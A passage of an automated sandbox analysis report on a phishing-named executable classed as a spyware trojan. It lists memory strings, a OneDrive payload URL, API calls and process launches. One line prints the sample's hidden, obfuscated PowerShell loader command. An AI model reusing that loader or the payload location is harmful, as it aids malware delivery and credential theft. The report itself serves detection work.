Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id1ResponseD
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id2
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id20
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id20Response
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id21
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id21Response
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id22
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id22Response
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id23
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB66000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id23Response
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EC6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id23ResponseD
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id24
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id24Response
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id2Response
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id2ResponseD
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id3
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EC6E000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id3Response
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EC6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id3ResponseD
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id4
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id4Response
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id5
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id5Response
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id6
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id6Response
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id7
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id7Response
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id8
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id8Response
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id9
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id9Response
Source: Price Offer_1200R4 1200R20.exe, Gastrostomize.exe.1.dr String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: Price Offer_1200R4 1200R20.exe, Gastrostomize.exe.1.dr String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: Price Offer_1200R4 1200R20.exe, Gastrostomize.exe.1.dr String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: Gastrostomize.exe, 00000004.00000003.2060001666.000000001FE9F000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000003.2060001666.000000001FEBB000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000003.2060001666.000000001FE12000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2099444975.000000001EE7D000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2103074293.000000001FD2D000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2099444975.000000001EEF0000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000003.2060001666.000000001FE2E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ip.sb/ip
Source: Gastrostomize.exe, 00000004.00000003.2060001666.000000001FE9F000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000003.2060001666.000000001FEBB000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000003.2060001666.000000001FE12000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2099444975.000000001EE7D000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2103074293.000000001FD2D000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2099444975.000000001EEF0000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000003.2060001666.000000001FE2E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Gastrostomize.exe, 00000004.00000003.2060001666.000000001FE9F000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000003.2060001666.000000001FEBB000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000003.2060001666.000000001FE12000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2099444975.000000001EE7D000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2103074293.000000001FD2D000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2099444975.000000001EEF0000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000003.2060001666.000000001FE2E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Gastrostomize.exe, 00000004.00000003.2060001666.000000001FE9F000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000003.2060001666.000000001FEBB000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000003.2060001666.000000001FE12000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2099444975.000000001EE7D000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2103074293.000000001FD2D000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2099444975.000000001EEF0000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000003.2060001666.000000001FE2E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Price Offer_1200R4 1200R20.exe, Gastrostomize.exe.1.dr String found in binary or memory: https://d.symcb.com/cps0%
Source: Price Offer_1200R4 1200R20.exe, Gastrostomize.exe.1.dr String found in binary or memory: https://d.symcb.com/rpa0
Source: Price Offer_1200R4 1200R20.exe, Gastrostomize.exe.1.dr String found in binary or memory: https://d.symcb.com/rpa0.
Source: Gastrostomize.exe, 00000004.00000003.2060001666.000000001FE9F000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000003.2060001666.000000001FEBB000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000003.2060001666.000000001FE12000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2099444975.000000001EE7D000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2103074293.000000001FD2D000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2099444975.000000001EEF0000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000003.2060001666.000000001FE2E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Gastrostomize.exe, 00000004.00000003.2060001666.000000001FEBB000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2099444975.000000001EE7D000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2103074293.000000001FD2D000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000003.2060001666.000000001FE2E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Gastrostomize.exe, 00000004.00000003.2060001666.000000001FE9F000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000003.2060001666.000000001FE12000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2099444975.000000001EEF0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtabS
Source: Gastrostomize.exe, 00000004.00000003.2060001666.000000001FE9F000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000003.2060001666.000000001FEBB000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000003.2060001666.000000001FE12000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2099444975.000000001EE7D000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2103074293.000000001FD2D000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2099444975.000000001EEF0000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000003.2060001666.000000001FE2E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Gastrostomize.exe, 00000004.00000003.1917772979.0000000002A49000.00000004.00000020.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000003.1905123304.0000000002A49000.00000004.00000020.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2084584439.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000003.1917689207.0000000002A3E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gcwema.bn.files.1drv.com/
Source: Gastrostomize.exe, 00000004.00000003.1905123304.0000000002A49000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gcwema.bn.files.1drv.com/d
Source: Gastrostomize.exe, 00000004.00000003.1905123304.0000000002A49000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gcwema.bn.files.1drv.com/y
Source: Gastrostomize.exe, 00000004.00000003.1917689207.0000000002A3E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gcwema.bn.files.1drv.com/y4mqvM36ByLD9K0VAWLVL6a1k1_p1wIfrODC391i7sxjSbFXZaU8m53aP1PNPBAw-Z2
Source: Gastrostomize.exe, 00000004.00000003.1917772979.0000000002A49000.00000004.00000020.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000003.1917689207.0000000002A3E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gcwema.bn.files.1drv.com/y4mye_Jf7K0w86rbJFL3Cz44mUGm8bynBGyx6Ciamik_PJLoT5oqohZzX2QmYT8NSIF
Source: Gastrostomize.exe, 00000004.00000002.2084584439.00000000029D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://onedrive.live.com/
Source: Gastrostomize.exe, 00000004.00000003.1905123304.0000000002A45000.00000004.00000020.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2085940185.00000000045D0000.00000004.00001000.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2084584439.0000000002A16000.00000004.00000020.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2084584439.00000000029D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://onedrive.live.com/download?resid=F547EE3E8FFF6BF5%21682&authkey=
Source: Gastrostomize.exe, 00000004.00000003.2060001666.000000001FE9F000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000003.2060001666.000000001FEBB000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000003.2060001666.000000001FE12000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2099444975.000000001EE7D000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2103074293.000000001FD2D000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2099444975.000000001EEF0000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000003.2060001666.000000001FE2E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: Gastrostomize.exe, 00000004.00000003.2060001666.000000001FE9F000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000003.2060001666.000000001FEBB000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000003.2060001666.000000001FE12000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2099444975.000000001EE7D000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2103074293.000000001FD2D000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2099444975.000000001EEF0000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000003.2060001666.000000001FE2E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Code function: 0_2_0040550F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_0040550F

System Summary

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Code function: 0_2_004033D8 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,SetCurrentDirectoryA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_004033D8
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_004033D8 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,LdrInitializeThunk,wsprintfA,GetFileAttributesA,DeleteFileA,LdrInitializeThunk,SetCurrentDirectoryA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 4_2_004033D8
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Code function: 0_2_004072D1 0_2_004072D1
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Code function: 0_2_00406AFA 0_2_00406AFA
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_004072D1 4_2_004072D1
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_00406AFA 4_2_00406AFA
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_000DD9CC 4_2_000DD9CC
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_20CB89B0 4_2_20CB89B0
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_20CBEFB8 4_2_20CBEFB8
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_20CB1498 4_2_20CB1498
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_20CB0040 4_2_20CB0040
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_20CB003B 4_2_20CB003B
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_20CB89A0 4_2_20CB89A0
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_21DDC128 4_2_21DDC128
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_21DDC708 4_2_21DDC708
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_21DD3D40 4_2_21DD3D40
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_21DDF3F8 4_2_21DDF3F8
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_21E2B15F 4_2_21E2B15F
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_21E296C8 4_2_21E296C8
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_21E2B6A8 4_2_21E2B6A8
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_21E27660 4_2_21E27660
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_21E2B999 4_2_21E2B999
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_21E26928 4_2_21E26928
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_21E348A0 4_2_21E348A0
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_21E691EC 4_2_21E691EC
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_21E65120 4_2_21E65120
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_21E649A0 4_2_21E649A0
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_21E6E310 4_2_21E6E310
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_21E691EC 4_2_21E691EC
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_21E691EC 4_2_21E691EC
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_21E941C0 4_2_21E941C0
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_21E9E698 4_2_21E9E698
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_21E9BCB7 4_2_21E9BCB7
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_21E91629 4_2_21E91629
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\nst4C1E.tmp\AdvSplash.dll 9CDBA2BB0984F10C201921AE5BCFE7B595771E1F12D9E17D31F213BFAF1548C6
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\nst4C1E.tmp\nsDialogs.dll B2699FDFDAB6A018FCC972806D12F71972DE1861660BB6578935D62B1DA06504
Source: Price Offer_1200R4 1200R20.exe Static PE information: invalid certificate
Source: Price Offer_1200R4 1200R20.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@6/17@2/2
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Code function: 0_2_004033D8 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,SetCurrentDirectoryA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_004033D8
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_004033D8 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,LdrInitializeThunk,wsprintfA,GetFileAttributesA,DeleteFileA,LdrInitializeThunk,SetCurrentDirectoryA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 4_2_004033D8
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Code function: 0_2_004047BF GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 0_2_004047BF
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Code function: 0_2_00402198 CoCreateInstance,MultiByteToWideChar, 0_2_00402198
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7500:120:WilError_03
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe File created: C:\Users\user\AppData\Local\Temp\nso4BB0.tmp
Source: Price Offer_1200R4 1200R20.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001F0D9000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2099444975.000000001EF9F000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2099444975.000000001F0C1000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2099444975.000000001EFC5000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2099444975.000000001EFB6000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2099444975.000000001F056000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2099444975.000000001F048000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2099444975.000000001F030000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Price Offer_1200R4 1200R20.exe ReversingLabs: Detection: 31%
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe File read: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe
Source: unknown Process created: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe "C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe"
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Facils=Get-Content 'C:\Users\user\AppData\Local\Temp\betalingsdatoer\oromo\tututni\Kaalhovedernes.Und33';$Cowpox=$Facils.SubString(36576,3);.$Cowpox($Facils)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe "C:\Users\user\AppData\Local\Temp\Gastrostomize.exe"
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Section loaded: propsys.dll
